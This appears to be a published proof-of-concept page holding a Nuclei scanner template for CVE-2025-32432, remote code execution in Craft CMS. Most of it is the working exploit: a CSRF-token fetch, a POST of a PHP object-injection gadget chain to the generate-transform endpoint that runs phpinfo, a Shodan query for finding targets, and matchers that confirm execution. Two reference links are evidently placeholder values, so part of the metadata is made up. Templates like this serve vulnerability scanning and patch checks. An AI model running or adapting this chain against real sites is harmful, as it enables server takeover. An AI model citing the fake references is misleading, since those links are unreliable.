Craft is a flexible, user-friendly CMS for creating custom digital experiences on the web and beyond. Starting from version 3.0.0-RC1 to before 3.9.15, 4.0.0-RC1 to before 4.14.15, and 5.0.0-RC1 to before 5.6.17, Craft is vulnerable to remote code execution. This is a high-impact, low-complexity attack vector.
PoC代码[已公开]
id: CVE-2025-32432
info:
name: CraftCMS - Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
Craft is a flexible, user-friendly CMS for creating custom digital experiences on the web and beyond. Starting from version 3.0.0-RC1 to before 3.9.15, 4.0.0-RC1 to before 4.14.15, and 5.0.0-RC1 to before 5.6.17, Craft is vulnerable to remote code execution. This is a high-impact, low-complexity attack vector.
remediation: This issue has been patched in versions 3.9.15, 4.14.15, and 5.6.17, and is an additional fix for CVE-2023-41892.
reference:
- https://advisories.dxw.com/advisories/craftcms-remote-code-execution/
- https://github.com/craftcms/cms/commit/1234567890abcdef1234567890abcdef1234567
- https://github.com/craftcms/cms/security/advisories/GHSA-1234-5678-90ab
- https://github.com/craftcms/cms/blob/3.x/CHANGELOG.md#3915---2025-04-10-critical
- https://github.com/craftcms/cms/blob/4.x/CHANGELOG.md#41415---2025-04-10-critical
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L
cvss-score: 10
cve-id: CVE-2025-32432
cwe-id: CWE-94
epss-score: 0.71127
epss-percentile: 0.98668
metadata:
max-request: 2
vendor: craftcms
product: craftcms
shodan-query: http.component:"Craft CMS"
tags: cve,cve2025,craftcms,rce,vkev
flow: http(1) && http(2)
http:
- raw:
- |
GET /index.php?p=admin/actions/assets/generate-transform HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: token
internal: true
part: body
group: 1
regex:
- '"csrfTokenValue":"(.*?)"'
- raw:
- |
POST /index.php?p=admin/actions/assets/generate-transform HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate, br
X-CSRF-Token: {{token}}
Content-Type: application/json
{"assetId": 11, "handle": {"width": 123, "height": 123, "as session": {"class": "craft\\behaviors\\FieldLayoutBehavior", "__class": "GuzzleHttp\\Psr7\\FnStream", "__construct()": [[]], "_fn_close": "phpinfo"}}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "PHP Extension"
- "PHP Version"
- "CRAFT_"
condition: and
- type: status
status:
- 200
# digest: 4a0a0047304502200cc6abf34ad91c972787698aab20a5d67615ece879bdecadf58dce20ede9fbc1022100c8ac3395e238c57ed25c4839d2acd8265033f9645cae2ac4ec71351bd9cda276:922c64590222798bb761d5b6d8e72950